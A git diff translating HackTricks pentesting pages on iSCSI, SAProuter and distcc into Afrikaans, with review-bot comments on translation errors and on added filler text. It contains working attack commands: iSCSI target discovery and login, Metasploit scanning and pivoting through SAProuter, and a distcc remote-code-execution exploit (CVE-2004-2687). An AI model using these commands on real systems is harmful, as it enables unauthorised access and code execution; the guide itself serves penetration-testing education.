-## Basic Information +## Basiese Inligting -From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI): +Vanaf [Wikipedia](https://en.wikipedia.org/wiki/ISCSI): -> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks (LANs), wide area networks (WANs), or the Internet and can enable location-independent data storage and retrieval. +> In rekenaars, is **iSCSI** 'n afkorting vir **Internet Small Computer Systems Interface**, 'n Internet Protocol (IP)-gebaseerde berging-netwerkstandaard vir die koppeling van data-bergingsfasiliteite. Dit bied blokvlaktoegang tot bergingsapparate deur SCSI-opdragte oor 'n TCP/IP-netwerk te dra. iSCSI word gebruik om data-oordragte oor intranette te fasiliteer en berging oor lang afstande te bestuur. Dit kan gebruik word om data oor plaaslike area-netwerke (LAN's), wye area-netwerke (WAN's) of die internet te stuur en kan lokasie-onafhanklike data-berging en -herwinning moontlik maak. > -> The protocol allows clients (called initiators) to send SCSI commands (CDBs) to storage devices (targets) on remote servers. It is a storage area network (SAN) protocol, allowing organizations to consolidate storage into storage arrays while providing clients (such as database and web servers) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure. 
- -**Default port:** 3260 +> Die protokol stel kliënte (genoem inisieerders) in staat om SCSI-opdragte (CDB's) na bergingsapparate (teikens) op afgeleë bedieners te stuur. Dit is 'n berging-area-netwerk (SAN)-protokol wat organisasies in staat stel om berging in bergingsreekse te konsolideer terwyl dit kliënte (soos databasis- en webbedieners) die illusie van lokaal aangehegte SCSI-skystukke bied. Dit kom hoofsaaklik in mededinging met Fibre Channel, maar anders as tradisionele Fibre Channel wat gewoonlik toegewyde bekabeling vereis, kan iSCSI oor lang afstande uitgevoer word deur gebruik te maak van bestaande netwerkinfrastruktuur. +**Verstekpoort:** 3260 ``` PORT STATE SERVICE VERSION 3260/tcp open iscsi? ``` +## Opstel -## Enumeration +Enumeration is 'n belangrike fase in die pentesting-proses wat dit moontlik maak om inligting oor 'n doelwit se iSCSI-implementasie te verkry. Hierdie inligting kan gebruik word om swakpunte te identifiseer en moontlike aanvalsveilighede te bepaal. +### iSCSI Dienste Identifiseer + +Die eerste stap in die enumerasieproses is om die teenwoordigheid van iSCSI-dienste op die doelwit te bevestig. Dit kan gedoen word deur die volgende tegnieke te gebruik: + +- **Portskandering**: Skandeer die doelwit se poorte om te bepaal of daar enige aktiewe poorte is wat verband hou met iSCSI-dienste. Die standaardpoort vir iSCSI is 3260. + +- **Netwerkverkeerontleding**: Monitor die netwerkverkeer om te soek na enige iSCSI-verkeer wat tussen die doelwit en ander toestelle plaasvind. + +- **Banneropname**: Ondersoek die banners wat deur die doelwit se dienste teruggestuur word om te soek na enige verwysings na iSCSI. + +### iSCSI Dienste Skandering + +Nadat die teenwoordigheid van iSCSI-dienste bevestig is, kan die volgende stap wees om die dienste te skandeer om verdere inligting te verkry. 
Hier is 'n paar tegnieke wat gebruik kan word: + +- **Portskandering**: Skandeer die aktiewe iSCSI-poorte om te bepaal of daar enige ander poorte is wat verband hou met die diens. + +- **iSCSI-ontdekkingskandering**: Gebruik die iSCSI-ontdekkingsprotokol om te soek na iSCSI-doelwitte wat deur die doelwit bedien word. + +- **iSCSI-identifikasie**: Identifiseer die iSCSI-doelwitte wat deur die doelwit bedien word en verkry inligting soos die doelwit se naam, serienommer, IP-adres en protokol. + +### iSCSI Dienste Inligting Versameling + +Die finale stap in die enumerasieproses is om inligting oor die iSCSI-dienste te versamel. Hier is 'n paar nuttige inligting wat verkry kan word: + +- **Doelwitinligting**: Verkry inligting soos die doelwit se IP-adres, subnetmasker, DNS-inligting en ander relevante netwerkinligting. + +- **Doelwitvermoëns**: Identifiseer die vermoëns van die doelwit se iSCSI-implementasie, soos die ondersteunde protokolle, versleuteling, verbindingsmetodes en toegangsbeheer. + +- **Gebruikersinligting**: Identifiseer enige gebruikers wat toegang het tot die iSCSI-dienste en verkry inligting soos gebruikersname, wagwoorde en toegangsregte. + +Deur hierdie enumerasietegnieke te gebruik, kan 'n pentester waardevolle inligting verkry oor 'n doelwit se iSCSI-implementasie, wat kan help om moontlike aanvalsveilighede te identifiseer en 'n suksesvolle aanval te beplan. ``` nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx ``` - -This script will indicate if authentication is required. +Hierdie skrip sal aandui of verifikasie vereis word. 
### [Brute force](../generic-methodologies-and-resources/brute-force.md#iscsi) -### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux) +### [Monteer ISCSI op Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux) -**Note:** You may find that when your targets are discovered, they are listed under a different IP address. This tends to happen if the iSCSI service is exposed via NAT or a virtual IP. In cases like these, `iscsiadmin` will fail to connect. This requires two tweaks: one to the directory name of the node automatically created by your discovery activities, and one to the `default` file contained within this directory. - -For example, you are trying to connect to an iSCSI target on 123.123.123.123 at port 3260. The server exposing the iSCSI target is actually at 192.168.1.2 but exposed via NAT. isciadm will register the _internal_ address rather than the _public_ address: +**Nota:** Jy mag vind dat wanneer jou teikens ontdek word, hulle gelys word onder 'n ander IP-adres. Dit gebeur dikwels as die iSCSI-diens blootgestel word deur middel van NAT of 'n virtuele IP. In sulke gevalle sal `iscsiadmin` nie kan verbind nie. Dit vereis twee aanpassings: een aan die gidsnaam van die node wat outomaties deur jou ontdekkingsaktiwiteite geskep is, en een aan die `default`-lêer wat in hierdie gids bevat word. +Byvoorbeeld, jy probeer verbind met 'n iSCSI-teiken op 123.123.123.123 by poort 3260. Die bediener wat die iSCSI-teiken blootstel, is eintlik by 192.168.1.2 maar blootgestel deur middel van NAT. isciadm sal die _interne_ adres registreer eerder as die _openbare_ adres: ``` iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260 192.168.1.2:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe [...] 
``` - -This command will create a directory in your filesystem like this: - +Hierdie bevel sal 'n gids in jou lêersisteem skep soos volg: ``` /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/ ``` +Binne die gids is daar 'n versteklêer met al die instellings wat nodig is om met die teiken te verbind. -Within the directory, there is a default file with all the settings necessary to connect to the target. +1. Hernoem `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/` na `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/` +2. Binne `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, verander die `node.conn[0].address` instelling om na 123.123.123.123 te wys in plaas van 192.168.1.2. Dit kan gedoen word met 'n opdrag soos `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default` -1. Rename `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/` to `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/` -2. Within `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, change the `node.conn[0].address` setting to point to 123.123.123.123 instead of 192.168.1.2. This could be done with a command such as `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default` +Jy kan nou die teiken monteer volgens die instruksies in die skakel. -You may now mount the target as per the instructions in the link. 
- -### [Mount ISCSI on Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN) - -## **Manual enumeration** +### [Monteer ISCSI op Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN) +## **Handmatige opname** ```bash sudo apt-get install open-iscsi ``` +Voorbeeld van [iscsiadm dokumentasie](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm): -Example from [iscsiadm docs](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm): - -First of all you need to **discover the targets** name behind the IP: - +Eerstens moet jy die teikens se name agter die IP **ontdek**: ```bash iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260 123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe [2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382 [fe80::211:3232:fab9:1223]:3260,1 iqn.2000-01.com.synology:Oassdx.Target-1.d0280fd382 ``` +_Merk op dat dit die I**P en poort van die interfaces** sal wys waar jy daardie **teikens** kan **bereik**. Dit kan selfs **interne IP's of verskillende IP's** as die een wat jy gebruik het, wys._ -_Note that it will show the I**P and port of the interfaces** where you can **reach** those **targets**. 
It can even **show internal IPs or different IPs** from the one you used._ - -Then you **catch the 2nd part of the printed string of each line** (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ from the first line) and **try to login**: - +Vang dan die 2de deel van die gedrukte string van elke lyn (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ van die eerste lyn) en **probeer om in te teken**: ```bash iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --login Logging in to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] (multiple) Login to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful. ``` - -Then, you can **logout** using `–logout` - +Dan kan jy **uitlog** deur `–logout` te gebruik ```bash iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --logout Logging out of session [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] Logout of [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful. ``` - -We can find **more information** about it by just using **without** any `--login`/`--logout` parameter - +Ons kan **meer inligting** daaroor vind deur net **sonder** enige `--login`/`--logout` parameter te gebruik. ```bash iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 # BEGIN RECORD 2.0-873 
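Review bot: `-## Enumeration` / `+## Opstel` is the same mistranslation as in the other files ("Opstel" means setup, not enumeration), and the hunk inserts roughly twenty lines of generic text under it ("Enumeration is 'n belangrike fase...", the "iSCSI Dienste Identifiseer" / "Skandering" / "Inligting Versameling" subsections) that are not in the English source, which goes straight from the heading to `nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx`. That filler should be dropped so the translation tracks the original one to one. While touching this section, the source typos `iscsiadmin` and `isciadm` in the NAT note (the tool is `iscsiadm`, as the command lines in the same hunk show) are worth correcting in the translated text rather than carrying over. As elsewhere, the blank lines before and after fenced blocks are removed in the `+` side; keep them to match the English layout.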
@@ -178,28 +195,27 @@ node.conn[0].iscsi.IFMarker = No node.conn[0].iscsi.OFMarker = No # END RECORD ``` - -**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm) +**Daar is 'n skrip om die basiese subnet opsporing proses outomaties te doen beskikbaar by** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm) ## **Shodan** * `port:3260 AuthMethod` -## **References** +## **Verwysings** * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) * [https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
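Review bot: in `+**Daar is 'n skrip om die basiese subnet opsporing proses outomaties te doen beskikbaar by**`, "enumeration" is rendered as "opsporing" (detection), whereas the rest of this patch uses "enumerasie" (for example "Blind Enumerasie" in the SAProuter page); use one term, e.g. "subnet-enumerasieproses", and join the compound rather than leaving three separate words. The `[**iscsiadm**](.../isciadm)` link-text/path mismatch predates this change and is not this patch's concern.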
diff --git a/network-services-pentesting/3299-pentesting-saprouter.md b/network-services-pentesting/3299-pentesting-saprouter.md index d2e2d166f..fdcb22595 100644 --- a/network-services-pentesting/3299-pentesting-saprouter.md +++ b/network-services-pentesting/3299-pentesting-saprouter.md @@ -1,91 +1,77 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- ```text PORT STATE SERVICE VERSION 3299/tcp open saprouter? ``` - -This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) +Hierdie is 'n opsomming van die pos vanaf [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) -## Understanding SAProuter Penetration with Metasploit +## Begrip van SAProuter Penetrasie met Metasploit -SAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and internal SAP networks. It's commonly exposed to the internet by allowing TCP port 3299 through organizational firewalls. This setup makes SAProuter an attractive target for penetration testing because it might serve as a gateway to high-value internal networks. +SAProuter tree op as 'n omgekeerde proxy vir SAP-stelsels, hoofsaaklik om toegang tussen die internet en interne SAP-netwerke te beheer. Dit word gewoonlik blootgestel aan die internet deur TCP-poort 3299 toe te laat deur organisatoriese vuurmuure. Hierdie opstelling maak SAProuter 'n aantreklike teiken vir penetrasietoetsing omdat dit as 'n toegangspoort tot hoëwaardige interne netwerke kan dien. -**Scanning and Information Gathering** - -Initially, a scan is performed to identify if a SAP router is running on a given IP using the **sap_service_discovery** module. This step is crucial for establishing the presence of a SAP router and its open port. +**Skandering en Inligting Versameling** +Aanvanklik word 'n skandering uitgevoer om te bepaal of 'n SAP-router op 'n gegewe IP hardloop deur die **sap_service_discovery**-module te gebruik. Hierdie stap is noodsaaklik om die teenwoordigheid van 'n SAP-router en sy oop poort te bevestig. 
```text msf> use auxiliary/scanner/sap/sap_service_discovery msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101 msf auxiliary(sap_service_discovery) > run ``` - -Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details. - +Na die ontdekking word verdere ondersoek na die SAP-router se konfigurasie uitgevoer met die **sap_router_info_request**-module om moontlik interne netwerkbesonderhede bloot te lê. ```text -msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request +msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101 msf auxiliary(sap_router_info_request) > run ``` +**Opnoem van Interne Dienste** -**Enumerating Internal Services** - -With obtained internal network insights, the **sap_router_portscanner** module is used to probe internal hosts and services through the SAProuter, allowing a deeper understanding of internal networks and service configurations. - +Met verkrygte interne netwerk-insigte, word die **sap_router_portscanner**-module gebruik om interne gasheerstelsels en dienste deur die SAProuter te ondersoek, wat 'n dieper begrip van interne netwerke en dienskonfigurasies moontlik maak. ```text msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50 msf auxiliary(sap_router_portscanner) > set PORTS 32NN ``` +Hierdie module se buigsaamheid om spesifieke SAP-instanties en poorte te teiken, maak dit 'n effektiewe instrument vir gedetailleerde interne netwerkverkenning. -This module's flexibility in targeting specific SAP instances and ports makes it an effective tool for detailed internal network exploration. 
- -**Advanced Enumeration and ACL Mapping** - -Further scanning can reveal how Access Control Lists (ACLs) are configured on the SAProuter, detailing which connections are allowed or blocked. This information is pivotal in understanding security policies and potential vulnerabilities. +**Gevorderde Opsomming en ACL-mapping** +Verdere skandering kan onthul hoe Toegangsbeheerlyste (ACL's) gekonfigureer is op die SAProuter, wat besonderhede verskaf oor watter verbindinge toegelaat of geblokkeer word. Hierdie inligting is van kardinale belang vir die verstaan van sekuriteitsbeleide en potensiële kwesbaarhede. ```text -msf auxiliary(sap_router_portscanner) > set MODE TCP +msf auxiliary(sap_router_portscanner) > set MODE TCP msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN ``` +**Blind Enumerasie van Interne Gasheer** -**Blind Enumeration of Internal Hosts** +In scenario's waar direkte inligting van die SAProuter beperk is, kan tegnieke soos blind enumerasie toegepas word. Hierdie benadering probeer raai en verifieer die bestaan van interne gasheernommers, wat potensiële teikens onthul sonder direkte IP-adresse. -In scenarios where direct information from the SAProuter is limited, techniques like blind enumeration can be applied. This approach attempts to guess and verify the existence of internal hostnames, revealing potential targets without direct IP addresses. - -**Leveraging Information for Penetration Testing** - -Having mapped the network and identified accessible services, penetration testers can utilize Metasploit's proxy capabilities to pivot through the SAProuter for further exploration and exploitation of internal SAP services. +**Benutting van Inligting vir Pentesting** +Nadat die netwerk in kaart gebring is en toeganklike dienste geïdentifiseer is, kan pentesters Metasploit se proksi-vermoëns gebruik om deur die SAProuter te draai vir verdere ondersoek en uitbuiting van interne SAP-dienste. 
```text msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299 msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18 msf auxiliary(sap_hostctrl_getcomputersystem) > run ``` +**Gevolgtrekking** -**Conclusion** +Hierdie benadering beklemtoon die belangrikheid van veilige SAProuter-konfigurasies en beklemtoon die potensiaal om toegang tot interne netwerke te verkry deur middel van doelgerigte penetrasietoetse. Dit is van kritieke belang om SAP-routers behoorlik te beveilig en hul rol in netwerksekuriteitsargitektuur te verstaan om teen ongemagtigde toegang te beskerm. -This approach underscores the importance of secure SAProuter configurations and highlights the potential for accessing internal networks through targeted penetration testing. Properly securing SAP routers and understanding their role in network security architecture is crucial for protecting against unauthorized access. - -For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db). +Vir meer gedetailleerde inligting oor Metasploit-modules en hul gebruik, besoek [Rapid7 se databasis](http://www.rapid7.com/db). -## **References** +## **Verwysings** * [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/) @@ -97,16 +83,14 @@ For more detailed information on Metasploit modules and their usage, visit [Rapi
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
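Review bot: the Blind Enumeration paragraph mistranslates "internal hostnames" as `interne gasheernommers` (host numbers); it should read "interne gasheername", and the heading `**Blind Enumerasie van Interne Gasheer**` should be plural ("Gashere") to match "Hosts". Two lines inside ```` ```text ```` fences are also rewritten by this translation commit:

`-msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request`
`-msf auxiliary(sap_router_portscanner) > set MODE TCP`

In both cases the `+` line looks identical apart from whitespace; please confirm that is all that changed and, in general, leave fenced command blocks untouched in translation patches so reviewers can trust that the commands still match the source. Finally, "pivot through the SAProuter" is rendered literally as "deur die SAProuter te draai"; keep the jargon ("pivot deur die SAProuter") so the sentence does not read as "turn".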
- - diff --git a/network-services-pentesting/3632-pentesting-distcc.md b/network-services-pentesting/3632-pentesting-distcc.md index 279153c58..d26335061 100644 --- a/network-services-pentesting/3632-pentesting-distcc.md +++ b/network-services-pentesting/3632-pentesting-distcc.md @@ -1,64 +1,56 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code. - -**Default port:** 3632 +**Distcc** is 'n instrument wat die **kompilasieproses** verbeter deur gebruik te maak van die **onbenutte verwerkingkrag** van ander rekenaars in die netwerk. Wanneer **distcc** op 'n masjien opgestel is, is hierdie masjien in staat om sy **kompilasietaak** na 'n ander stelsel te versprei. Hierdie ontvangende stelsel moet die **distccd daemon** laat loop en 'n **verenigbare kompilator** geïnstalleer hê om die gestuurde kode te verwerk. +**Verstekpoort:** 3632 ``` PORT STATE SERVICE 3632/tcp open distccd ``` +# Uitbuiting -# Exploitation - -Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: - +Kyk of dit vatbaar is vir **CVE-2004-2687** om willekeurige kode uit te voer: ```bash msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" ``` - # Shodan -_I don't think shodan detects this service._ +_Ek dink nie Shodan detect hierdie diens nie._ -# Resources +# Hulpbronne * [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec) * [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) -Post created by **Álex B (@r1p)** +Pos geskep deur **Álex B (@r1p)**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy 